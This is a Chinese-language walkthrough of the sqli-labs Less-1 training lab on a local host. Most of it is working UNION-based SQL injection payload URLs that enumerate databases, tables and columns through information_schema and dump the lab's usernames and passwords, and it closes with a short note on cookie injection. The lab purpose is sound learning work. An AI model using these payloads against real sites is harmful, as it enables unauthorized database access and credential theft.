预备知识
对mysql数据库有一定了解;对基本的sql语句有所了解;对url编码有了解:空格=‘%20’,单引号=‘%27’,双引号=‘%22’,井号=‘%23’等基本步骤
1. 判断是什么类型注入,有没有过滤关键字,是否能绕过2. 确定存在注入的表的列数以及表中数据那些字段可以显示出来3. 获取数据库版本,用户,当前连接的数据库等信息4. 获取数据库中所有表的信息5. 获取某个表的列字段信息5. 获取相应表的数据
Less1,基于错误的GET单引号字符型注入。
(单引号,and 1=1,and 1=2,)http://127.0.0.1/sqli/Less-1/?id=2%27(宽字节注入)错误提示:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''2'' LIMIT 0,1' at line 1此时的注入语句为: SELECT * FROM users WHERE id='2'' LIMIT 0,1 (报单引号不匹配的错) 注释符常用的有两种:1. -- ' 一定要注意在最后一个单引号前面有空格2. # (空格#空格)第二步确定表的列数:
使用order by 语句。
当试到'4'时,出现报错信息,可以知道该表有3列: Unknown column '4' in 'order clause'执行的sql语句是:SELECT * FROM users WHERE id='2' order by 4 -- '' LIMIT 0,1第三步,确定字段的显示位:
显示位:表中数据第几位的字段可以 显示,因为并不是所有的查询结果都 会展示在页面中,因此需要探测页面 中展示的查询结果是哪一列的结果; ‘union select 1,2,3 – ’ 通过显示的数字可以判断那些字段可以显示出来。http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,2,3 -- '可见2,3所在的字段可以显示ps:id=-1,使用-1是为了使前一个sql语句所选的内容为空,从而便于后面的select语句显示信息 第四步获取当前数据库信息现在只有两个字段可以显示信息,显然在后面的查询数据中,两个字段是不够用,可以使用group_concat ()函数(可以把查询出来的多行数据连接起来在一个字段中显示) database()函数:查看当前数据库名称version()函数:查看数据库版本信息
user():返回当前数据库连接使用的用户
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,database()或者version()),3 -- ' Your Login name:security5.5.53 Your Password:3可以知道当前数据库名为security,数据库版本为5.5.53第五步,获取全部数据库信息(表,列信息)
Mysql有一个系统的数据库information_schema,里面保存着所有数据库的相关信息,使用该表完成注入http://127.0.0.1/sqli/Less-1/?id=-1' union select 1, group_concat(schema_name),3 from information_schema.schemata -- ' 爆出所有数据库名字以上命令可以获取到了所有的数据库信息 information_schema ,security(是例题中的数据库信息)
第六步:获取security数据库中的表信息http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,table_name,3 from information_schema.tables where table_schema='security' -- '(一般情况下要最好将security使用16进制hex编码转换。转换后记得要加0x)
Your Login name: emails , referers , uagents , users Your Password:3ps:table_schema= '数据库的名' table_name 表信息 第七步:获取user表的列http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,column_name,3 from information_schema.columns where table_name='users' limit0,1 -- '(users最好转换,I春秋上介绍,这句话的意思是查询information_schema数据库中columns表里的column_name字段(就是表最上面的标题)。条件是table_name为user
Your Login name: user_id , first_name , last_name , user , password , avatar , last_login , failed_login , id , username , password Your Password:3执行的sql语句是:SELECT * FROM users WHERE id='-1' union select 1,column_name, ,3 from information_schema.columns where table_name='users' -- '' LIMIT 0,1 这个一般都要加,加上去改变数字会导致不同第八步:获取数据
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,username,password,3 from users -- '
Your Login name: Dumb Dumb, Angelina I-kill-you, Dummy p@ssword, secure crappy, stupid stupidity, superman genious, batman mob!le, admin admin, admin1 admin1, admin2 admin2, admin3 admin3, dhakkan dumbo, admin4 admin4 Your Password:3Writeup,我要先查到注入类型跟注入点,然后用order by 查询整个大数据库里表的列数,database()显示的是当前页面所使用的数据库名称,shecm这个是mysql5.0版本之后特有的一个数据库,他包含了整个大数据库里所有数据库的表名跟列名。然后用union select 1,2,3…查列显示位置是多少。然后获取当前数据库的名字:union select 1,database()(写在显示位),3 –- ';得到当前数据库名称后,要找到当前数据库所有表信息,然后对指定想要获取的数据库获取数据库表信息(第六步),然后获取指定表下面的列信息 union select 列 from 表
第二篇:
Information_schema:存储mysql数据库下所有数据库的表名和列名信息的自带数据库
information_schema.schemata:存储mysql数据库下所有数据库的库名信息的表 (字段名为 schema_name的字段值) 字段就是列名information_schema.tables:存储mysql数据库下所有数据库的表名信息的表 (字段名为 table_name:表名条件为 table_schema:数据库名 )information_schema.columns:存储mysql数据库下所有数据库的列名信息的表 (字段名为column_name:的字段值))
cookie注入:burp里截取到用户COOKIE后,将ID=多少再referer中cookie后面加分号之后填写上去,再写入命令。